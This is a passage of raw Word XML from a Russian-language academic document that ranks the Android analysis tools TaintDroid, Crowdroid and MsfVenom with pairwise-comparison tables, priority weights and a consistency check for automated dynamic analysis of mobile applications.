            <w:r w:rsidRPr="00D6635B">
              <w:t>Crowdroid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1686" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00E9217A" w:rsidRPr="00D6635B" w:rsidRDefault="00E9217A" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6635B">
              <w:t>MsfVenom</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1660" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00E9217A" w:rsidRPr="00D6635B" w:rsidRDefault="00531F4B" w:rsidP="00531F4B">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r>
              <w:t>П</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1692" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00E9217A" w:rsidRPr="00D6635B" w:rsidRDefault="00E9217A" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6635B">
              <w:t xml:space="preserve">Локальный </w:t>
            </w:r>
            <w:r w:rsidR="005E7E20" w:rsidRPr="00D6635B">
              <w:t>приоритет</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CF733B" w:rsidTr="009915DA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1686" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00CF733B" w:rsidRPr="00D6635B" w:rsidRDefault="00CF733B" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6635B">
              <w:t>TaintDroid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1788" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CF733B" w:rsidRPr="00D6635B" w:rsidRDefault="00CF733B" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6635B">
              <w:t>1,00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1683" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CF733B" w:rsidRPr="00D6635B" w:rsidRDefault="00CF733B" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6635B">
              <w:t>0,33</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1686" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CF733B" w:rsidRPr="00D6635B" w:rsidRDefault="00CF733B" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6635B">
              <w:t>3,00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1660" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CF733B" w:rsidRPr="00D6635B" w:rsidRDefault="00CF733B" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6635B">
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1692" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CF733B" w:rsidRPr="00D6635B" w:rsidRDefault="00CF733B" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6635B">
              <w:t>0,258285</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CF733B" w:rsidTr="009915DA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1686" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00CF733B" w:rsidRPr="00D6635B" w:rsidRDefault="00CF733B" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6635B">
              <w:t>Crowdroid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1788" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00CF733B" w:rsidRPr="00D6635B" w:rsidRDefault="00CF733B" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6635B">
              <w:t>3,00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1683" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00CF733B" w:rsidRPr="00D6635B" w:rsidRDefault="00CF733B" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6635B">
              <w:t>1,00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1686" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00CF733B" w:rsidRPr="00D6635B" w:rsidRDefault="00CF733B" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6635B">
              <w:t>5,00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1660" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00CF733B" w:rsidRPr="00D6635B" w:rsidRDefault="00CF733B" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6635B">
              <w:t>2,466212</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1692" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CF733B" w:rsidRPr="00D6635B" w:rsidRDefault="00CF733B" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6635B">
              <w:t>0,636986</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CF733B" w:rsidTr="009915DA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1686" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00CF733B" w:rsidRPr="00D6635B" w:rsidRDefault="00CF733B" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6635B">
              <w:t>MsfVenom</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1788" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CF733B" w:rsidRPr="00D6635B" w:rsidRDefault="00CF733B" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6635B">
              <w:t>0,33</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1683" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CF733B" w:rsidRPr="00D6635B" w:rsidRDefault="00CF733B" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6635B">
              <w:t>0,20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1686" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CF733B" w:rsidRPr="00D6635B" w:rsidRDefault="00CF733B" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6635B">
              <w:t>1,00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1660" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CF733B" w:rsidRPr="00D6635B" w:rsidRDefault="00CF733B" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6635B">
              <w:t>0,40548</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1692" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CF733B" w:rsidRPr="00D6635B" w:rsidRDefault="00CF733B" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6635B">
              <w:t>0,104729</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CF733B" w:rsidTr="008638DD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1686" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00CF733B" w:rsidRPr="00D6635B" w:rsidRDefault="00CF733B" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6635B">
              <w:t>Сумма</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1788" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00CF733B" w:rsidRPr="00D6635B" w:rsidRDefault="00CF733B" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6635B">
              <w:t>4,33</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1683" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00CF733B" w:rsidRPr="00D6635B" w:rsidRDefault="00CF733B" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6635B">
              <w:t>1,53</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1686" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00CF733B" w:rsidRPr="00D6635B" w:rsidRDefault="00CF733B" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6635B">
              <w:t>9,00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1660" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00CF733B" w:rsidRPr="00D6635B" w:rsidRDefault="00CF733B" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6635B">
              <w:t>3,87</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1692" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00CF733B" w:rsidRPr="00D6635B" w:rsidRDefault="00CF733B" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6635B">
              <w:t>1,00</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008638DD" w:rsidTr="008638DD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1686" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="008638DD" w:rsidRPr="00D6635B" w:rsidRDefault="008638DD" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1788" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="008638DD" w:rsidRPr="00D6635B" w:rsidRDefault="008638DD" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1683" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="008638DD" w:rsidRPr="00D6635B" w:rsidRDefault="008638DD" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1686" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="008638DD" w:rsidRPr="00D6635B" w:rsidRDefault="008638DD" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1660" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="008638DD" w:rsidRPr="00D6635B" w:rsidRDefault="008638DD" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1692" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="008638DD" w:rsidRPr="00D6635B" w:rsidRDefault="008638DD" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00DF2AB7" w:rsidRDefault="00DF2AB7" w:rsidP="009915DA">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F2AB7" w:rsidRPr="00B934D3" w:rsidTr="00AF064D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9344" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00DF2AB7" w:rsidRPr="00B934D3" w:rsidRDefault="00F870DF"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F2AB7" w:rsidRPr="00B934D3" w:rsidTr="00AF064D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9344" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00DF2AB7" w:rsidRPr="00B934D3" w:rsidRDefault="00DF2AB7" w:rsidP="00AF064D">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:i/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <m:oMathPara>
              <m:oMath>
                <m:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                  </w:rPr>
                  <w:lastRenderedPageBreak/>
                  <m:t>ИС=</m:t>
                </m:r>
                <m:r>
                  <m:rPr>
                    <m:sty m:val="p"/>
                  </m:rPr>
                  <w:rPr>
                    <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                  </w:rPr>
                  <m:t>0,019256</m:t>
                </m:r>
              </m:oMath>
            </m:oMathPara>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DF2AB7" w:rsidTr="00AF064D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9344" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00DF2AB7" w:rsidRDefault="00DF2AB7" w:rsidP="00AF064D">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <m:oMathPara>
              <m:oMath>
                <m:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                  </w:rPr>
                  <m:t>СС=0,58</m:t>
                </m:r>
              </m:oMath>
            </m:oMathPara>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DF2AB7" w:rsidTr="00AF064D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9344" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00DF2AB7" w:rsidRPr="00DF2AB7" w:rsidRDefault="00DF2AB7" w:rsidP="00DF2AB7">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DD4C25" w:rsidRDefault="00DD4C25" w:rsidP="009915DA">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>Так как вычисленный параметр ОС не превышает значения 0,1, может сделать вывод, что превосходства сравниваемых параметров оценены корректно.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0019431F" w:rsidRDefault="0019431F" w:rsidP="009915DA">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>Определение приоритетов исследуемые средств проведен</w:t>
      </w:r>
      <w:r w:rsidR="00DF2AB7">
        <w:t xml:space="preserve">ия динамического анализа МПУ на возможность автоматизированного запуск </w:t>
      </w:r>
      <w:r w:rsidR="00FB15D4">
        <w:t>представлено в таблице 6</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00354ED1" w:rsidRPr="00354ED1" w:rsidRDefault="0019431F" w:rsidP="00D6635B">
      <w:pPr>
        <w:pStyle w:val="aff0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Таблица </w:t>
      </w:r>
      <w:r w:rsidR="00FB15D4">
        <w:t>6</w:t>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DD4C25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1561" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="009915DA" w:rsidRDefault="009915DA" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1619"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tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="009915DA" w:rsidRPr="00962B68" w:rsidRDefault="00531F4B" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>П</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1585" w:type="dxa"/>
            <w:tcBorders>
              <w:top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478" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="009915DA" w:rsidRPr="00962B68" w:rsidRDefault="009915DA" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
              <w:rPr>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00962B68">
              <w:rPr>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1585" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="009915DA" w:rsidRPr="00962B68" w:rsidRDefault="009915DA" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
              <w:rPr>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00962B68">
              <w:rPr>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>0,258285</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5,00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1478" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009915DA" w:rsidRPr="00962B68" w:rsidRDefault="009915DA" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
              <w:rPr>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00962B68">
              <w:rPr>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>2,466212</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1585" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009915DA" w:rsidRPr="00962B68" w:rsidRDefault="009915DA" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
              <w:rPr>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00962B68">
              <w:rPr>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>0,636986</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0,20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478" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009915DA" w:rsidRPr="00962B68" w:rsidRDefault="009915DA" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
              <w:rPr>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00962B68">
              <w:rPr>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>0,40548</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1585" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009915DA" w:rsidRPr="00962B68" w:rsidRDefault="009915DA" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
              <w:rPr>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00962B68">
              <w:rPr>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>0,104729</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Pr>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Сумма</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4,33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1,53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9,00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1478" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="009915DA" w:rsidRPr="00962B68" w:rsidRDefault="009915DA" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
              <w:rPr>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00962B68">
              <w:rPr>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>3,87</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1585" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="009915DA" w:rsidRPr="00962B68" w:rsidRDefault="009915DA" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
              <w:rPr>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00962B68">
              <w:rPr>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>1,00</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008638DD" w:rsidTr="00DD4C25">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962B68" w:rsidRDefault="008638DD" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
              <w:rPr>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1540" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="008638DD" w:rsidRPr="00962B68" w:rsidRDefault="008638DD" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
              <w:rPr>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1561" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="008638DD" w:rsidRPr="00962B68" w:rsidRDefault="008638DD" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
              <w:rPr>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1478" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="008638DD" w:rsidRPr="00962B68" w:rsidRDefault="008638DD" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
              <w:rPr>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1585" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="008638DD" w:rsidRPr="00962B68" w:rsidRDefault="008638DD" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
              <w:rPr>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00DD4C25"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F870DF"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19431F" w:rsidRDefault="00DD4C25" w:rsidP="00DD4C25">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>Следовательно, оценка проведена корректно</w:t>
      </w:r>
      <w:r w:rsidR="009C6151">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C6151" w:rsidRDefault="009C6151" w:rsidP="00DD4C25">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
